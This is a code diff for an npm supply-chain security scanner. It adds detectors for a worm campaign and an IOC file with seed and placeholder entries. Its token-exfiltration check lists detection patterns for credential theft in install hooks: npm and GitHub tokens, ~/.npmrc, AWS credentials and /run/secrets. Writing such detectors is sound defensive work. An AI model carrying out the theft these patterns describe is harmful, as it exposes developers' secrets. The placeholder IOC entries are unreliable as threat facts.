22
|
+
}
|
|
23
|
+
}
|
|
24
|
+
|
|
25
|
+
let fingerprint = 0n;
|
|
26
|
+
for (let i = 0; i < 64; i++) {
|
|
27
|
+
if (v[i] > 0) {
|
|
28
|
+
fingerprint |= (1n << BigInt(i));
|
|
29
|
+
}
|
|
30
|
+
}
|
|
31
|
+
return fingerprint;
|
|
32
|
+
}
|
|
33
|
+
|
|
34
|
+
export function hammingDistance(a, b) {
|
|
35
|
+
let xor = a ^ b;
|
|
36
|
+
let count = 0;
|
|
37
|
+
while (xor > 0n) {
|
|
38
|
+
count += Number(xor & 1n);
|
|
39
|
+
xor >>= 1n;
|
|
40
|
+
}
|
|
41
|
+
return count;
|
|
42
|
+
}
|
|
43
|
+
|
|
44
|
+
export function similarity(a, b) {
|
|
45
|
+
return 1 - hammingDistance(a, b) / 64;
|
|
46
|
+
}
|
|
@@ -10,6 +10,8 @@ import * as atk009 from './atk-009-dormant-trigger.js';
|
|
|
10
10
|
import * as atk010 from './atk-010-sandbox-evasion.js';
|
|
11
11
|
import * as atk011 from './atk-011-transitive-prop.js';
|
|
12
12
|
import { scanAll as megalodonScan } from './megalodon/index.js';
|
|
13
|
+
import { scan as hfScan } from './hf-impersonation/index.js';
|
|
14
|
+
import { scan as miniShaiHuludScan } from './mini-shai-hulud/index.js';
|
|
13
15
|
|
|
14
16
|
export async function runAll(pkgJson, files = [], registryMeta = null, allFiles = null) {
|
|
15
17
|
const findings = [];
|
|
@@ -25,5 +27,7 @@ export async function runAll(pkgJson, files = [], registryMeta = null, allFiles
|
|
|
25
27
|
findings.push(...await atk010.scan(pkgJson, files));
|
|
26
28
|
findings.push(...await atk011.scan(pkgJson, files));
|
|
27
29
|
findings.push(...await megalodonScan(pkgJson, allFiles || files, registryMeta));
|
|
30
|
+
findings.push(...await hfScan(pkgJson, files, registryMeta, allFiles || files));
|
|
31
|
+
findings.push(...await miniShaiHuludScan(pkgJson, files, registryMeta, allFiles || files));
|
|
28
32
|
return findings.sort((a, b) => b.severity.localeCompare(a.severity));
|
|
29
33
|
}
|
|
@@ -0,0 +1,42 @@
|
|
|
1
|
+
export async function checkBurstPublish(registryMeta, config = {}) {
|
|
2
|
+
const windowMinutes = config.burstWindowMinutes ?? 30;
|
|
3
|
+
const threshold = config.burstVersionThreshold ?? 3;
|
|
4
|
+
|
|
5
|
+
const times = registryMeta?.time || {};
|
|
6
|
+
const entries = Object.entries(times)
|
|
7
|
+
.filter(([v]) => v !== 'created' && v !== 'modified')
|
|
8
|
+
.filter(([, t]) => t)
|
|
9
|
+
.map(([v, t]) => [v, new Date(t).getTime()])
|
|
10
|
+
.filter(([, ts]) => !Number.isNaN(ts))
|
|
11
|
+
.sort((a, b) => a[1] - b[1]);
|
|
12
|
+
|
|
13
|
+
if (entries.length === 0) return { triggered: false };
|
|
14
|
+
|
|
15
|
+
const windowMs = windowMinutes * 60 * 1000;
|
|
16
|
+
|
|
17
|
+
for (let i = 0; i < entries.length; i++) {
|
|
18
|
+
const windowStart = entries[i][1];
|
|
19
|
+
const windowEnd = windowStart + windowMs;
|
|
20
|
+
const inWindow = [];
|
|
21
|
+
|
|
22
|
+
for (let j = i; j < entries.length; j++) {
|
|
23
|
+
if (entries[j][1] <= windowEnd) {
|
|
24
|
+
inWindow.push(entries[j][0]);
|
|
25
|
+
} else {
|
|
26
|
+
break;
|
|
27
|
+
}
|
|
28
|
+
}
|
|
29
|
+
|
|
30
|
+
if (inWindow.length >= threshold) {
|
|
31
|
+
return {
|
|
32
|
+
triggered: true,
|
|
33
|
+
windowStart: new Date(windowStart).toISOString(),
|
|
34
|
+
windowEnd: new Date(windowEnd).toISOString(),
|
|
35
|
+
versionCount: inWindow.length,
|
|
36
|
+
versions: inWindow,
|
|
37
|
+
};
|
|
38
|
+
}
|
|
39
|
+
}
|
|
40
|
+
|
|
41
|
+
return { triggered: false };
|
|
42
|
+
}
|
|
@@ -0,0 +1,116 @@
|
|
|
1
|
+
const siblingCache = new Map();
|
|
2
|
+
|
|
3
|
+
export function clearSiblingCache() {
|
|
4
|
+
siblingCache.clear();
|
|
5
|
+
}
|
|
6
|
+
|
|
7
|
+
function checkBurstOnTimeMap(timeMap, windowMinutes, threshold) {
|
|
8
|
+
const entries = Object.entries(timeMap)
|
|
9
|
+
.filter(([v]) => v !== 'created' && v !== 'modified')
|
|
10
|
+
.filter(([, t]) => t)
|
|
11
|
+
.map(([v, t]) => [v, new Date(t).getTime()])
|
|
12
|
+
.filter(([, ts]) => !Number.isNaN(ts))
|
|
13
|
+
.sort((a, b) => a[1] - b[1]);
|
|
14
|
+
|
|
15
|
+
if (entries.length === 0) return null;
|
|
16
|
+
|
|
17
|
+
const windowMs = windowMinutes * 60 * 1000;
|
|
18
|
+
|
|
19
|
+
for (let i = 0; i < entries.length; i++) {
|
|
20
|
+
const wStart = entries[i][1];
|
|
21
|
+
const wEnd = wStart + windowMs;
|
|
22
|
+
const inWindow = [];
|
|
23
|
+
|
|
24
|
+
for (let j = i; j < entries.length; j++) {
|
|
25
|
+
if (entries[j][1] <= wEnd) {
|
|
26
|
+
inWindow.push(entries[j][0]);
|
|
27
|
+
} else {
|
|
28
|
+
break;
|
|
29
|
+
}
|
|
30
|
+
}
|
|
31
|
+
|
|
32
|
+
if (inWindow.length >= threshold) {
|
|
33
|
+
return {
|
|
34
|
+
windowStart: new Date(wStart).toISOString(),
|
|
35
|
+
windowEnd: new Date(wEnd).toISOString(),
|
|
36
|
+
versionCount: inWindow.length,
|
|
37
|
+
};
|
|
38
|
+
}
|
|
39
|
+
}
|
|
40
|
+
|
|
41
|
+
return null;
|
|
42
|
+
}
|
|
43
|
+
|
|
44
|
+
export async function checkSiblingCompromise(pkgJson, config = {}) {
|
|
45
|
+
const windowMinutes = config.burstWindowMinutes ?? 30;
|
|
46
|
+
const threshold = config.burstVersionThreshold ?? 3;
|
|
47
|
+
|
|
48
|
+
const deps = {
|
|
49
|
+
...pkgJson.dependencies,
|
|
50
|
+
...pkgJson.devDependencies,
|
|
51
|
+
...pkgJson.peerDependencies,
|
|
52
|
+
};
|
|
53
|
+
|
|
54
|
+
const scopedDeps = {};
|
|
55
|
+
for (const name of Object.keys(deps)) {
|
|
56
|
+
if (name.startsWith('@')) {
|
|
57
|
+
const scope = name.split('/')[0];
|
|
58
|
+
if (!scopedDeps[scope]) scopedDeps[scope] = [];
|
|
59
|
+
scopedDeps[scope].push(name);
|
|
60
|
+
}
|
|
61
|
+
}
|
|
62
|
+
|
|
63
|
+
if (Object.keys(scopedDeps).length === 0) return { triggered: false };
|
|
64
|
+
|
|
65
|
+
const results = [];
|
|
66
|
+
|
|
67
|
+
for (const [scope, packages] of Object.entries(scopedDeps)) {
|
|
68
|
+
if (packages.length < 2) continue;
|
|
69
|
+
|
|
70
|
+
const burstSiblings = [];
|
|
71
|
+
|
|
72
|
+
for (const pkg of packages) {
|
|
73
|
+
let timeData = siblingCache.get(pkg);
|
|
74
|
+
if (!timeData) {
|
|
75
|
+
try {
|
|
76
|
+
const url = `https://registry.npmjs.org/${encodeURIComponent(pkg)}`;
|
|
77
|
+
const res = await fetch(url);
|
|
78
|
+
if (!res.ok) continue;
|
|
79
|
+
const data = await res.json();
|
|
80
|
+
timeData = data.time || {};
|
|
81
|
+
siblingCache.set(pkg, timeData);
|
|
82
|
+
} catch {
|
|
83
|
+
continue;
|
|
84
|
+
}
|
|
85
|
+
}
|
|
86
|
+
|
|
87
|
+
const burstInfo = checkBurstOnTimeMap(timeData, windowMinutes, threshold);
|
|
88
|
+
if (burstInfo) {
|
|
89
|
+
burstSiblings.push({ name: pkg, ...burstInfo });
|
|
90
|
+
}
|
|
91
|
+
}
|
|
92
|
+
|
|
93
|
+
if (burstSiblings.length >= 2) {
|
|
94
|
+
const windows = burstSiblings.map(s => ({
|
|
95
|
+
start: new Date(s.windowStart).getTime(),
|
|
96
|
+
end: new Date(s.windowEnd).getTime(),
|
|
97
|
+
}));
|
|
98
|
+
|
|
99
|
+
const overlapStart = Math.max(...windows.map(w => w.start));
|
|
100
|
+
const overlapEnd = Math.min(...windows.map(w => w.end));
|
|
101
|
+
|
|
102
|
+
if (overlapStart < overlapEnd) {
|
|
103
|
+
results.push({
|
|
104
|
+
triggered: true,
|
|
105
|
+
scope,
|
|
106
|
+
siblingPackages: burstSiblings.map(s => s.name),
|
|
107
|
+
windowStart: new Date(overlapStart).toISOString(),
|
|
108
|
+
windowEnd: new Date(overlapEnd).toISOString(),
|
|
109
|
+
});
|
|
110
|
+
}
|
|
111
|
+
}
|
|
112
|
+
}
|
|
113
|
+
|
|
114
|
+
if (results.length === 0) return { triggered: false };
|
|
115
|
+
return { triggered: true, results };
|
|
116
|
+
}
|
|
@@ -0,0 +1,72 @@
|
|
|
1
|
+
export async function checkSlsaMismatch(packageName, version, burstWindow, timeMap = {}, config = {}) {
|
|
2
|
+
if (!burstWindow?.triggered) return { triggered: false };
|
|
3
|
+
|
|
4
|
+
const anomalies = [];
|
|
5
|
+
const publishTime = timeMap?.[version];
|
|
6
|
+
if (!publishTime) return { triggered: false };
|
|
7
|
+
|
|
8
|
+
try {
|
|
9
|
+
const url = `https://registry.npmjs.org/-/npm/v1/attestations/${encodeURIComponent(packageName)}/${encodeURIComponent(version)}`;
|
|
10
|
+
const res = await fetch(url);
|
|
11
|
+
if (!res.ok) return { triggered: false };
|
|
12
|
+
|
|
13
|
+
const data = await res.json();
|
|
14
|
+
const attestations = data?.attestations || [];
|
|
15
|
+
if (attestations.length === 0) return { triggered: false };
|
|
16
|
+
|
|
17
|
+
const publishMs = new Date(publishTime).getTime();
|
|
18
|
+
if (Number.isNaN(publishMs)) return { triggered: false };
|
|
19
|
+
|
|
20
|
+
// Check if this is the first-ever attested version for this package
|
|
21
|
+
const allVersions = Object.keys(timeMap).filter(v => v !== 'created' && v !== 'modified');
|
|
22
|
+
const currentIdx = allVersions.indexOf(version);
|
|
23
|
+
let prevHadAttestation = false;
|
|
24
|
+
|
|
25
|
+
if (currentIdx > 0) {
|
|
26
|
+
const priorVersions = allVersions.slice(0, currentIdx).slice(-2);
|
|
27
|
+
for (const pv of priorVersions) {
|
|
28
|
+
try {
|
|
29
|
+
const purl = `https://registry.npmjs.org/-/npm/v1/attestations/${encodeURIComponent(packageName)}/${encodeURIComponent(pv)}`;
|
|
30
|
+
const pres = await fetch(purl);
|
|
31
|
+
if (pres.ok) {
|
|
32
|
+
const pdata = await pres.json();
|
|
33
|
+
if (pdata?.attestations?.length > 0) {
|
|
34
|
+
prevHadAttestation = true;
|
|
35
|
+
break;
|
|
36
|
+
}
|
|
37
|
+
}
|
|
38
|
+
} catch {
|
|
39
|
+
// skip prior version check
|
|
40
|
+
}
|
|
41
|
+
}
|
|
42
|
+
|
|
43
|
+
if (!prevHadAttestation && priorVersions.length > 0) {
|
|
44
|
+
anomalies.push(`First-ever SLSA attestation for ${packageName}, published in burst window`);
|
|
45
|
+
}
|
|
46
|
+
}
|
|
47
|
+
|
|
48
|
+
for (const att of attestations) {
|
|
49
|
+
const ts = att?.timestamp;
|
|
50
|
+
if (ts) {
|
|
51
|
+
const attMs = new Date(ts).getTime();
|
|
52
|
+
if (!Number.isNaN(attMs) && attMs >= publishMs && (attMs - publishMs) < 60000) {
|
|
53
|
+
const gapMs = attMs - publishMs;
|
|
54
|
+
anomalies.push(`Sub-60s attestation gap for ${version}: ${gapMs}ms`);
|
|
55
|
+
}
|
|
56
|
+
}
|
|
57
|
+
|
|
58
|
+
const builderId = att?.predicate?.runDetails?.builder?.id;
|
|
59
|
+
if (builderId) {
|
|
60
|
+
const knownPrefixes = ['https://github.com/', 'https://gitlab.com/', 'https://circleci.com/'];
|
|
61
|
+
const isKnown = knownPrefixes.some(p => builderId.startsWith(p));
|
|
62
|
+
if (!isKnown) {
|
|
63
|
+
anomalies.push(`Unrecognized builder ID for ${version}: ${builderId}`);
|
|
64
|
+
}
|
|
65
|
+
}
|
|
66
|
+
}
|
|
67
|
+
} catch {
|
|
68
|
+
return { triggered: false };
|
|
69
|
+
}
|
|
70
|
+
|
|
71
|
+
return { triggered: anomalies.length > 0, anomalies };
|
|
72
|
+
}
|
|
@@ -0,0 +1,45 @@
|
|
|
1
|
+
export async function checkMaintainerAnomaly(registryMeta, config = {}) {
|
|
2
|
+
const versions = registryMeta?.versions || {};
|
|
3
|
+
const timeMap = registryMeta?.time || {};
|
|
4
|
+
|
|
5
|
+
const sorted = Object.entries(timeMap)
|
|
6
|
+
.filter(([v]) => v !== 'created' && v !== 'modified')
|
|
7
|
+
.filter(([, t]) => t)
|
|
8
|
+
.map(([v, t]) => ({
|
|
9
|
+
version: v,
|
|
10
|
+
time: new Date(t).getTime(),
|
|
11
|
+
user: versions[v]?._npmUser?.name,
|
|
12
|
+
}))
|
|
13
|
+
.filter(e => !Number.isNaN(e.time) && e.user)
|
|
14
|
+
.sort((a, b) => a.time - b.time);
|
|
15
|
+
|
|
16
|
+
if (sorted.length < 2) return { triggered: false };
|
|
17
|
+
|
|
18
|
+
for (let i = 1; i < sorted.length; i++) {
|
|
19
|
+
const prev = sorted[i - 1];
|
|
20
|
+
const curr = sorted[i];
|
|
21
|
+
|
|
22
|
+
if (curr.user !== prev.user) {
|
|
23
|
+
const gapMinutes = (curr.time - prev.time) / (1000 * 60);
|
|
24
|
+
if (gapMinutes <= 10) {
|
|
25
|
+
const newUserVersions = sorted.filter(e => e.user === curr.user);
|
|
26
|
+
if (newUserVersions.length >= 2) {
|
|
27
|
+
return {
|
|
28
|
+
triggered: true,
|
|
29
|
+
signals: [{
|
|
30
|
+
type: 'PUBLISHER_DRIFT_RAPID',
|
|
31
|
+
previousPublisher: prev.user,
|
|
32
|
+
newPublisher: curr.user,
|
|
33
|
+
gapMinutes,
|
|
34
|
+
newUserVersionCount: newUserVersions.length,
|
|
35
|
+
driftVersion: curr.version,
|
|
36
|
+
driftWindowStart: new Date(curr.time).toISOString(),
|
|
37
|
+
}],
|
|
38
|
+
};
|
|
39
|
+
}
|
|
40
|
+
}
|
|
41
|
+
}
|
|
42
|
+
}
|
|
43
|
+
|
|
44
|
+
return { triggered: false };
|
|
45
|
+
}
|
|
@@ -0,0 +1,95 @@
|
|
|
1
|
+
import { readFileSync } from 'fs';
|
|
2
|
+
import { fileURLToPath } from 'url';
|
|
3
|
+
import { dirname, join } from 'path';
|
|
4
|
+
|
|
5
|
+
let iocsData = null;
|
|
6
|
+
let iocsLoaded = false;
|
|
7
|
+
let iocLoadError = null;
|
|
8
|
+
|
|
9
|
+
const __filename = fileURLToPath(import.meta.url);
|
|
10
|
+
const __dirname = dirname(__filename);
|
|
11
|
+
const IOC_PATH = join(__dirname, 'iocs.json');
|
|
12
|
+
|
|
13
|
+
function loadIOCData() {
|
|
14
|
+
if (iocsLoaded) return iocsData;
|
|
15
|
+
iocsLoaded = true;
|
|
16
|
+
try {
|
|
17
|
+
iocsData = JSON.parse(readFileSync(IOC_PATH, 'utf8'));
|
|
18
|
+
} catch (err) {
|
|
19
|
+
iocLoadError = err;
|
|
20
|
+
iocsData = null;
|
|
21
|
+
}
|
|
22
|
+
return iocsData;
|
|
23
|
+
}
|
|
24
|
+
|
|
25
|
+
export function getIOCLoadError() {
|
|
26
|
+
return iocLoadError;
|
|
27
|
+
}
|
|
28
|
+
|
|
29
|
+
export function reloadIOCData() {
|
|
30
|
+
iocsLoaded = false;
|
|
31
|
+
iocLoadError = null;
|
|
32
|
+
return loadIOCData();
|
|
33
|
+
}
|
|
34
|
+
|
|
35
|
+
export async function checkIOC(pkgName, pkgVersion, sha512, publisherAccount, timeMap = {}) {
|
|
36
|
+
const data = loadIOCData();
|
|
37
|
+
if (!data) return { triggered: false, matches: [] };
|
|
38
|
+
|
|
39
|
+
const matches = [];
|
|
40
|
+
const allIOCs = [];
|
|
41
|
+
|
|
42
|
+
allIOCs.push(...(data.iocs || []));
|
|
43
|
+
|
|
44
|
+
for (const waveKey of Object.keys(data.waves || {})) {
|
|
45
|
+
const wave = data.waves[waveKey];
|
|
46
|
+
const waveNum = waveKey === 'wave1' ? 1 : 2;
|
|
47
|
+
for (const ioc of (wave.iocs || [])) {
|
|
48
|
+
allIOCs.push({ ...ioc, wave: waveNum });
|
|
49
|
+
}
|
|
50
|
+
}
|
|
51
|
+
|
|
52
|
+
for (const ioc of allIOCs) {
|
|
53
|
+
switch (ioc.type) {
|
|
54
|
+
case 'packageName': {
|
|
55
|
+
if (ioc.value === pkgName) {
|
|
56
|
+
if (!ioc.maliciousVersions || ioc.maliciousVersions.length === 0 || ioc.maliciousVersions.includes(pkgVersion)) {
|
|
57
|
+
matches.push({ type: 'packageName', value: pkgName, wave: ioc.wave });
|
|
58
|
+
}
|
|
59
|
+
}
|
|
60
|
+
break;
|
|
61
|
+
}
|
|
62
|
+
|
|
63
|
+
case 'packageScope': {
|
|
64
|
+
if (pkgName.startsWith(ioc.value)) {
|
|
65
|
+
matches.push({ type: 'packageScope', value: ioc.value, wave: ioc.wave });
|
|
66
|
+
}
|
|
67
|
+
break;
|
|
68
|
+
}
|
|
69
|
+
|
|
70
|
+
case 'sha512': {
|
|
71
|
+
if (ioc.value === sha512 && ioc.package === pkgName) {
|
|
72
|
+
matches.push({ type: 'sha512', value: sha512, wave: ioc.wave, package: pkgName });
|
|
73
|
+
}
|
|
74
|
+
break;
|
|
75
|
+
}
|
|
76
|
+
|
|
77
|
+
case 'publisherAccount': {
|
|
78
|
+
if (ioc.value === publisherAccount) {
|
|
79
|
+
const pubTime = new Date(timeMap?.[pkgVersion]).getTime();
|
|
80
|
+
const windowStart = new Date(ioc.compromiseWindowStart).getTime();
|
|
81
|
+
const windowEnd = ioc.compromiseWindowEnd
|
|
82
|
+
? new Date(ioc.compromiseWindowEnd).getTime()
|
|
83
|
+
: Infinity;
|
|
84
|
+
|
|
85
|
+
if (!Number.isNaN(pubTime) && pubTime >= windowStart && pubTime <= windowEnd) {
|
|
86
|
+
matches.push({ type: 'publisherAccount', value: publisherAccount, wave: ioc.wave });
|
|
87
|
+
}
|
|
88
|
+
}
|
|
89
|
+
break;
|
|
90
|
+
}
|
|
91
|
+
}
|
|
92
|
+
}
|
|
93
|
+
|
|
94
|
+
return { triggered: matches.length > 0, matches };
|
|
95
|
+
}
|
|
@@ -0,0 +1,38 @@
|
|
|
1
|
+
const EXFIL_PATTERNS = [
|
|
2
|
+
/NPM_TOKEN|NODE_AUTH_TOKEN|GH_TOKEN|GITHUB_TOKEN|npm_token|node_auth_token/i,
|
|
3
|
+
/~\/(\.npmrc|\.gitconfig|\.aws\/credentials)/,
|
|
4
|
+
/\/run\/secrets\//,
|
|
5
|
+
/\$GITHUB_ENV/,
|
|
6
|
+
/process\.env\.(NPM_TOKEN|NODE_AUTH_TOKEN|GH_TOKEN|GITHUB_TOKEN)/,
|
|
7
|
+
/Buffer\.from\s*\([^)]*\)\s*\.\s*toString\s*\(\s*['"]base64['"]\s*\)/,
|
|
8
|
+
/\batob\s*\(/,
|
|
9
|
+
/\bbtoa\s*\(/,
|
|
10
|
+
];
|
|
11
|
+
|
|
12
|
+
const SUSPICIOUS_SCRIPTS = ['preinstall', 'install', 'postinstall', 'prepare'];
|
|
13
|
+
|
|
14
|
+
const MAX_SNIPPET_LENGTH = 200;
|
|
15
|
+
|
|
16
|
+
function truncateSnippet(text) {
|
|
17
|
+
if (text.length <= MAX_SNIPPET_LENGTH) return text;
|
|
18
|
+
return text.slice(0, MAX_SNIPPET_LENGTH - 3) + '...';
|
|
19
|
+
}
|
|
20
|
+
|
|
21
|
+
export function checkTokenExfil(allFiles, pkgJson) {
|
|
22
|
+
const scripts = pkgJson?.scripts || {};
|
|
23
|
+
const snippets = [];
|
|
24
|
+
|
|
25
|
+
for (const hook of SUSPICIOUS_SCRIPTS) {
|
|
26
|
+
const scriptContent = scripts[hook];
|
|
27
|
+
if (!scriptContent) continue;
|
|
28
|
+
|
|
29
|
+
for (const pattern of EXFIL_PATTERNS) {
|
|
30
|
+
if (pattern.test(scriptContent)) {
|
|
31
|
+
snippets.push(truncateSnippet(scriptContent));
|
|
32
|
+
break;
|
|
33
|
+
}
|
|
34
|
+
}
|
|
35
|
+
}
|
|
36
|
+
|
|
37
|
+
return { triggered: snippets.length > 0, snippets };
|
|
38
|
+
}
|
|
@@ -0,0 +1,80 @@
|
|
|
1
|
+
import { checkBurstPublish } from './d1-burst-publish.js';
|
|
2
|
+
import { checkSiblingCompromise, clearSiblingCache } from './d2-sibling-compromise.js';
|
|
3
|
+
import { checkSlsaMismatch } from './d3-slsa-mismatch.js';
|
|
4
|
+
import { checkMaintainerAnomaly } from './d4-maintainer-anomaly.js';
|
|
5
|
+
import { checkIOC } from './d5-ioc-check.js';
|
|
6
|
+
import { checkTokenExfil } from './d6-token-exfil.js';
|
|
7
|
+
|
|
8
|
+
export async function scan(pkgJson, files = [], registryMeta = null, allFiles = null) {
|
|
9
|
+
const config = {};
|
|
10
|
+
|
|
11
|
+
const burstResult = await checkBurstPublish(registryMeta, config);
|
|
12
|
+
const maintainerResult = await checkMaintainerAnomaly(registryMeta, config);
|
|
13
|
+
|
|
14
|
+
const pkgName = pkgJson?.name || '';
|
|
15
|
+
const pkgVersion = pkgJson?.version || '';
|
|
16
|
+
const sha512 = registryMeta?.versions?.[pkgVersion]?.dist?.integrity || null;
|
|
17
|
+
const publisherAccount = registryMeta?.versions?.[pkgVersion]?._npmUser?.name || null;
|
|
18
|
+
const timeMap = registryMeta?.time || {};
|
|
19
|
+
|
|
20
|
+
const iocResult = await checkIOC(pkgName, pkgVersion, sha512, publisherAccount, timeMap);
|
|
21
|
+
const exfilResult = checkTokenExfil(allFiles || files, pkgJson);
|
|
22
|
+
|
|
23
|
+
let siblingResult = { triggered: false };
|
|
24
|
+
let slsaResult = { triggered: false };
|
|
25
|
+
|
|
26
|
+
if (burstResult.triggered) {
|
|
27
|
+
siblingResult = await checkSiblingCompromise(pkgJson, config);
|
|
28
|
+
slsaResult = await checkSlsaMismatch(pkgName, pkgVersion, burstResult, timeMap, config);
|
|
29
|
+
}
|
|
30
|
+
|
|
31
|
+
const triggeredChecks = [];
|
|
32
|
+
if (burstResult.triggered) triggeredChecks.push('D1_BURST');
|
|
33
|
+
if (siblingResult.triggered) triggeredChecks.push('D2_SIBLING');
|
|
34
|
+
if (slsaResult.triggered) triggeredChecks.push('D3_SLSA');
|
|
35
|
+
if (maintainerResult.triggered) triggeredChecks.push('D4_MAINTAINER');
|
|
36
|
+
if (iocResult.triggered) triggeredChecks.push('D5_IOC');
|
|
37
|
+
if (exfilResult.triggered) triggeredChecks.push('D6_EXFIL');
|
|
38
|
+
|
|
39
|
+
if (triggeredChecks.length === 0) return [];
|
|
40
|
+
|
|
41
|
+
let waveAttribution = 'unknown';
|
|
42
|
+
if (pkgName.startsWith('@tanstack')) {
|
|
43
|
+
waveAttribution = 'wave1-tanstack';
|
|
44
|
+
} else if (pkgName.startsWith('@antv')) {
|
|
45
|
+
waveAttribution = 'wave2-antv';
|
|
46
|
+
} else if (iocResult.matches && iocResult.matches.length > 0) {
|
|
47
|
+
const waves = [...new Set(iocResult.matches.map(m => m.wave))];
|
|
48
|
+
if (waves.length === 1) {
|
|
49
|
+
waveAttribution = waves[0] === 1 ? 'wave1-tanstack' : 'wave2-antv';
|
|
50
|
+
}
|
|
51
|
+
}
|
|
52
|
+
|
|
53
|
+
const isCritical = slsaResult.triggered || iocResult.triggered;
|
|
54
|
+
|
|
55
|
+
const evidence = {
|
|
56
|
+
campaign: 'MINI_SHAI_HULUD',
|
|
57
|
+
waveAttribution,
|
|
58
|
+
triggeredChecks,
|
|
59
|
+
burstWindow: burstResult.triggered
|
|
60
|
+
? { start: burstResult.windowStart, end: burstResult.windowEnd, versionCount: burstResult.versionCount }
|
|
61
|
+
: null,
|
|
62
|
+
siblingPackages: siblingResult.triggered
|
|
63
|
+
? siblingResult.results.flatMap(r => r.siblingPackages)
|
|
64
|
+
: null,
|
|
65
|
+
attestationAnomalies: slsaResult.triggered ? slsaResult.anomalies : null,
|
|
66
|
+
iocMatches: iocResult.triggered ? iocResult.matches : null,
|
|
67
|
+
installScriptSnippets: exfilResult.triggered ? exfilResult.snippets : null,
|
|
68
|
+
};
|
|
69
|
+
|
|
70
|
+
return [{
|
|
71
|
+
id: 'MINI_SHAI_HULUD',
|
|
72
|
+
severity: isCritical ? 'critical' : 'high',
|
|
73
|
+
title: 'Mini Shai-Hulud worm campaign',
|
|
74
|
+
description: `${triggeredChecks.length} signal(s): ${triggeredChecks.join(', ')}`,
|
|
75
|
+
evidence: JSON.stringify(evidence),
|
|
76
|
+
mitigation: 'Revoke all npm tokens immediately. Rotate CI/CD secrets. Audit maintainer access on all scoped packages. Review recent version publish history for anomalous bursts. Check for postinstall scripts accessing credentials or environment variables. If Wave 1 (TanStack scope): inspect GitHub Actions workflow logs for unauthorized build steps. If Wave 2 (atool/AntV scope): rotate all npm tokens associated with @antv/* packages.',
|
|
77
|
+
}];
|
|
78
|
+
}
|
|
79
|
+
|
|
80
|
+
export { clearSiblingCache } from './d2-sibling-compromise.js';
|
|
@@ -0,0 +1,47 @@
|
|
|
1
|
+
{
|
|
2
|
+
"lastUpdated": "2026-05-24T00:00:00.000Z",
|
|
3
|
+
"waves": {
|
|
4
|
+
"wave1": {
|
|
5
|
+
"id": "mini-shai-hulud-wave1",
|
|
6
|
+
"description": "TanStack CI/CD hijack (mid-May 2026) — 84 malicious versions across 42 packages in ~6 minutes via compromised GitHub Actions CI. Forged SLSA BL3 provenance attestations.",
|
|
7
|
+
"windowMinutes": 6,
|
|
8
|
+
"iocs": [
|
|
9
|
+
{
|
|
10
|
+
"type": "packageScope",
|
|
11
|
+
"value": "@tanstack",
|
|
12
|
+
"maliciousVersionRanges": [],
|
|
13
|
+
"notes": "Seed IOC — update from threat intel feed. Affected: @tanstack/router, @tanstack/react-router, @tanstack/query, @tanstack/form, @tanstack/store, @tanstack/virtual, @tanstack/ranger, @tanstack/table."
|
|
14
|
+
}
|
|
15
|
+
]
|
|
16
|
+
},
|
|
17
|
+
"wave2": {
|
|
18
|
+
"id": "mini-shai-hulud-wave2",
|
|
19
|
+
"description": "AntV/atool maintainer account compromise (late May 2026) — 600+ malicious versions across 300+ packages in ~22 minutes. ~16M weekly download blast radius.",
|
|
20
|
+
"windowMinutes": 22,
|
|
21
|
+
"iocs": [
|
|
22
|
+
{
|
|
23
|
+
"type": "publisherAccount",
|
|
24
|
+
"value": "atool",
|
|
25
|
+
"compromiseWindowStart": "2026-05-20T00:00:00.000Z",
|
|
26
|
+
"compromiseWindowEnd": null,
|
|
27
|
+
"notes": "Seed IOC — compromised @antv/atool maintainer account. Update compromise window from threat intel."
|
|
28
|
+
},
|
|
29
|
+
{
|
|
30
|
+
"type": "packageScope",
|
|
31
|
+
"value": "@antv",
|
|
32
|
+
"maliciousVersionRanges": [],
|
|
33
|
+
"notes": "Blast radius: @antv/g2, @antv/g6, @antv/x6, @antv/l7, echarts-for-react, timeago.js. Seed IOC — update from threat intel."
|
|
34
|
+
}
|
|
35
|
+
]
|
|
36
|
+
}
|
|
37
|
+
},
|
|
38
|
+
"iocs": [
|
|
39
|
+
{
|
|
40
|
+
"type": "sha512",
|
|
41
|
+
"value": "sha512-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
|
|
42
|
+
"package": "@antv/g2",
|
|
43
|
+
"wave": 2,
|
|
44
|
+
"notes": "Placeholder sha512 — replace with actual SHA-512 integrity hash from npm dist.integrity of a confirmed malicious version."
|
|
45
|
+
}
|
|
46
|
+
]
|
|
47
|
+
}
|
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@lateos/npm-scan",
|
|
3
|
-
"version": "0.15.
|
|
3
|
+
"version": "0.15.4",
|
|
4
4
|
"description": "Modern npm supply chain security scanner — detects obfuscated payloads, credential stealers, conditional triggers, sandbox evasion, and worm-like propagation. 11 attack types, SBOM, NIST/EU CRA compliance reporting.",
|
|
5
5
|
"main": "backend/index.js",
|
|
6
6
|
"bin": {
|